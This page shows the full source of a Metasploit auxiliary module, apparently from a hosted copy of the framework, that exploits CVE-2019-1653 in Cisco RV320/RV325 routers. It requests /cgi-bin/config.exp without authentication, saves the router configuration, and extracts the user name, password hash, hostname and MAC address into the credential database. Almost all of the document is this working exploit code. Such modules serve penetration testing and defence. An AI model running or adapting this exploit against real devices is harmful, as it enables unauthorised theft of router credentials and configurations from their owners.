Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/gather/cisco_rv320_config.rb
Views: 11778
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize(info = {})9super(update_info(info,10'Name' => 'Cisco RV320/RV326 Configuration Disclosure',11'Description' => %q{12A vulnerability in the web-based management interface of Cisco Small Business13RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,14remote attacker to retrieve sensitive information. The vulnerability is due15to improper access controls for URLs. An attacker could exploit this16vulnerability by connecting to an affected device via HTTP or HTTPS and17requesting specific URLs. A successful exploit could allow the attacker to18download the router configuration or detailed diagnostic information. Cisco19has released firmware updates that address this vulnerability.20},21'Author' =>22[23'RedTeam Pentesting GmbH <[email protected]>',24'Aaron Soto <[email protected]>'25],26'License' => MSF_LICENSE,27'References' =>28[29['EDB', '46262'],30['BID', '106732'],31['CVE', '2019-1653'],32['URL', 'https://seclists.org/fulldisclosure/2019/Jan/52'],33['URL', 'https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801'],34['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20110330-acs.html']35],36'DisclosureDate' => '2019-01-24',37'DefaultOptions' =>38{39'SSL' => true40}41))4243register_options(44[45Opt::RPORT(443),46OptString.new('TARGETURI', [true, 'Path to the device configuration file', '/cgi-bin/config.exp']),47])48end4950def report_cred(user, hash)51service_data = {52address: rhost,53port: rport,54service_name: ssl ? 'https' : 'http',55protocol: 'tcp',56workspace_id: myworkspace_id57}5859credential_data = {60module_fullname: self.fullname,61origin_type: :service,62private_data: hash,63private_type: :nonreplayable_hash,64jtr_format: 'md5',65username: user,66}.merge(service_data)6768login_data = {69core: create_credential(credential_data),70status: Metasploit::Model::Login::Status::UNTRIED71}.merge(service_data)7273create_credential_login(login_data)74end7576def parse_config(config)77# Report loot to database (and store on filesystem)78stored_path = store_loot('cisco.rv.config', 'text/plain', rhost, config)79print_good("Stored configuration (#{config.length} bytes) to #{stored_path}")8081# Report host information to database82hostname = config.match(/^HOSTNAME=(.*)/)[1]83model = config.match(/^MODEL=(.*)/)[1]84mac = config.match(/^LANMAC=(.*)/)[1]85mac = mac.scan(/\w{2}/).join(':')86report_host(host: rhost,87mac: mac,88name: hostname,89os_name: 'Cisco',90os_flavor: model)9192# Report password hashes to database93user = config.match(/^user (.*)/)[1]94hash = config.match(/^password (.*)/)[1]95report_cred(user, hash)96end9798def run99begin100uri = normalize_uri(target_uri.path)101res = send_request_cgi({102'uri' => uri,103'method' => 'GET',104}, 60)105rescue OpenSSL::SSL::SSLError106fail_with(Failure::UnexpectedReply, 'SSL handshake failed. Consider setting SSL to false and trying again.')107end108109if res.nil?110fail_with(Failure::UnexpectedReply, 'Empty response. Please validate the RHOST and TARGETURI options and try again.')111elsif res.code != 200112fail_with(Failure::UnexpectedReply, "Unexpected HTTP #{res.code} response. Please validate the RHOST and TARGETURI options and try again.")113end114115body = res.body116if body.match(/####sysconfig####/)117parse_config(body)118else body.include?"meta http-equiv=refresh content='0; url=/default.htm'"119fail_with(Failure::NotVulnerable, 'Response suggests device is patched')120end121end122end123124125